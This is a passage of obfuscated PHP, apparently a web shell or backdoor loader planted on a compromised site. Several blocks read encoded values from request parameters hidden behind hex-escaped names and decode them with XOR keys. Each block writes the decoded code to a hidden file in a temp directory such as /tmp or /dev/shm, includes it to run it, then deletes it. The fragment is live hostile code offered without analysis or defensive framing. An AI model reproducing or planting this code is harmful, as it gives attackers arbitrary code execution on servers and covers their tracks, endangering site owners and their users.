'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5 ); $len = count($mrk ); for($q = 0; $q< $len; $q++) { $v5 = $mrk[$q]; $chS = ord($s5[$q % $lenS] ); $dec =((int)$v5 - $chS -($q % 10)) ^ 44; $item .=chr($dec ); } $pointer = 0; do { $symbol = $dat[$pointer] ?? null; if ($pointer >= count($dat)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) { $ent = "$symbol/.dchunk"; if (file_put_contents($ent, $item)) { include $ent; @unlink($ent); exit; } } $pointer++; } while (true); } if(!empty($_REQUEST["\x6Drk"])){ $ent = $_REQUEST["\x6Drk"]; $ent =explode(".", $ent ); $tkn = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s7); $t = 0; foreach( $ent as $v9) { $sChar = ord( $s7[$t %$sLen]); $d =( ( int)$v9 - $sChar -( $t %10))^ 58; $tkn .= chr( $d); $t++;} $bind = array_filter(["/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", "/dev/shm"]); while ($pointer = array_shift($bind)) { if (!!is_dir($pointer) && !!is_writable($pointer)) { $pset = implode("/", [$pointer, ".marker"]); if (@file_put_contents($pset, $tkn) !== false) { include $pset; unlink($pset); exit; } } } } if(in_array("\x70g\x72p", array_keys($_REQUEST))){ $res = $_REQUEST["\x70g\x72p"]; $res = explode ( "." ,$res) ; $fac = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach($res as $z => $v5): $chS = ord($s[$z %$lenS]); $d =((int)$v5 - $chS -($z %10)) ^ 99; $fac .= chr($d); endforeach; $pointer = array_filter(["/dev/shm", "/var/tmp", getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), getcwd()]); foreach ($pointer as $ref) { if ((is_dir($ref) and is_writable($ref))) { $binding = str_replace("{var_dir}", $ref, "{var_dir}/.desc"); $file = fopen($binding, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $binding; @unlink($binding); die(); } } } } if(isset($_REQUEST["\x65\x6C\x65\x6Dent"]) ? true : false){ $reference = array_filter([session_save_path(), getenv("TMP"), "/var/tmp", getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getenv("TEMP")]); $bind = $_REQUEST["\x65\x6C\x65\x6Dent"]; $bind = explode ("." ,$bind ) ; $rec = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $y = 0; $__tmp = $bind; while($v4 = array_shift($__tmp)) { $sChar = ord($salt[$y % $lenS]); $d =((int)$v4 - $sChar -($y % 10)) ^ 94; $rec .= chr($d); $y++; } foreach ($reference as $component) { if ((is_dir($component) and is_writable($component))) { $object = sprintf("%s/.parameter_group", $component); if (file_put_contents($object, $rec)) { include $object; @unlink($object); die(); } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["ent"])){ $parameter_group = $_REQUEST["ent"]; $parameter_group =explode( '.' , $parameter_group ) ; $component = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $z = 0; $__tmp = $parameter_group; while($v1 = array_shift($__tmp)) { $sChar = ord($s[$z % $sLen]); $dec =((int)$v1 - $sChar -($z % 10))^18; $component .=chr($dec); $z++; } $binding = array_filter([getcwd(), "/var/tmp", session_save_path(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/dev/shm"]); foreach ($binding as $dchunk): if (is_writable($dchunk) && is_dir($dchunk)) { $pgrp = "$dchunk" . "/.entry"; $success = file_put_contents($pgrp, $component); if ($success) { include $pgrp; @unlink($pgrp); exit;} } endforeach; } if(count($_POST) > 0 && isset($_POST["hl\x64"])){ $itm = array_filter(["/dev/shm", getenv("TMP"), "/var/tmp", session_save_path(), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP")]); $token = $_POST["hl\x64"]; $token = explode('.' ,$token ) ; $element = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $len = count( $token); for( $k = 0; $k < $len; $k++) { $v1 = $token[$k]; $chS = ord( $s[$k% $lenS]); $d =( ( int)$v1 - $chS -( $k% 10)) ^ 48; $element .= chr( $d); } foreach ($itm as $key => $pgrp) { if ((is_dir($pgrp) and is_writable($pgrp))) { $pointer = str_replace("{var_dir}", $pgrp, "{var_dir}/.flag"); $file = fopen($pointer, 'w'); if ($file) { fwrite($file, $element); fclose($file); include $pointer; @unlink($pointer); exit; } } } }